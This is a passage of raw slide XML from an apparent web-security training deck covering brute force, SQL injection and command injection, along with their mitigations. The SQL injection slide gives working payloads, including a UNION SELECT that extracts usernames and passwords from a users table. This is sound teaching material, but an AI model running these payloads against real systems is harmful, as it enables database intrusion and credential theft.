            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name=""/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3582360"/>
            <a:ext cx="9144000" cy="1107000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="8000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff4000"/>
                </a:solidFill>
                <a:latin typeface="URW Bookman"/>
              </a:rPr>
              <a:t>THANK YOU ALL!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="8000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ff4000"/>
              </a:solidFill>
              <a:latin typeface="URW Bookman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <mc:AlternateContent>
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow">
        <p:random/>
      </p:transition>
    </mc:Fallback>
  </mc:AlternateContent>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6" presetSubtype="16" repeatCount="5000">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="150">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="circle(in)" transition="in">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="27" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15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seq>
              <p:cTn id="28" restart="whenNotActive" nodeType="interactiveSeq" fill="hold">
                <p:stCondLst>
                  <p:cond delay="0"/>
                </p:stCondLst>
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="29" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="0"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" nodeType="afterEffect" fill="remove" presetClass="entr" presetID="23" presetSubtype="16" repeatCount="indefinite">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:endCondLst>
                                    <p:cond evt="onNext"/>
                                  </p:endCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="10" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="151">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="33" dur="5000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="151">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="34" dur="5000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="151">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Introduction.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127"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66000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="142560" indent="-142560">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="f6f9d4"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Explore the critical topic of web app security. We’ll delve into common vulnerabilities that plague web applications, including:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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Brute Force Attacks.</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SQL Injection (SQLi)</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Command Injection.</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File Upload Vulnerabilities.</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File Inclusion Vulnerabilities.</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Cross-Site Scripting (XSS)</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Cross-Site Request Forgery (CSRF)</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Open HTTP Redirection.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="712800" indent="-142560">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="f6f9d4"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>JavaScript Vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="142560" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="f6f9d4"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <mc:AlternateContent>
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000">
        <p:wipe dir="u"/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow">
        <p:wipe dir="u"/>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Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129"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71000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="306720" indent="-2300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It’s a trial-and-error method used by attackers to crack passwords or encryption keys by attempting all possible combinations. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306720" indent="-23004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Mitigation:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="920160" indent="-204480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="850"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Use strong passwords</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="920160" indent="-204480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="850"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Implement account lockout mechanisms that temporarily lock user account after a certain number of failed login attempts.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="920160" indent="-204480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="850"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Introduce CAPTCHA challenges during the login process.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="920160" indent="-204480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="850"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Multi-factor authentication.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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SQL Injection (SQLi)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503640" y="1326240"/>
            <a:ext cx="9068760" cy="4159080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
            <a:normAutofit fontScale="24000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="103680" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="103680" indent="-77760">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>It’s a cyber attack where malicious SQL code is injected into a web applications to manipulate database.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="103680" indent="-77760">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>%' or '1'='1'</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="207360" indent="-77760">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1134"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="41190d"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>%: This is used as a wildcard, ensuring the injected code doesn't break the syntax.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="103680" indent="-77760">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="207360" indent="-77760">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1134"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="41190d"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>When executed, the above payload attempts to retrieve the first name, last name, username, and password of users from the users table, formatting the output for readability by inserting line feed characters(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>0x0a)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="41190d"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> between each piece of information.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="103680" indent="-77760">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Mitigation:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="207360" indent="-77760">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1134"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Using parameterized queries.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="207360" indent="-77760">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1134"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Input validation.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="207360" indent="-77760">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1134"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="7200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Employing web application firewalls to filter and block malicious SQLi queries.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="7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Command Injection</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503640" y="1371240"/>
            <a:ext cx="9323640" cy="3240720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
            <a:normAutofit fontScale="33000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="142560" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2305"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="431"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="142560" indent="-106920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2305"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="431"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>It’s an attack where attackers execute arbitrary commands on a host's operating system through a vulnerable application. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
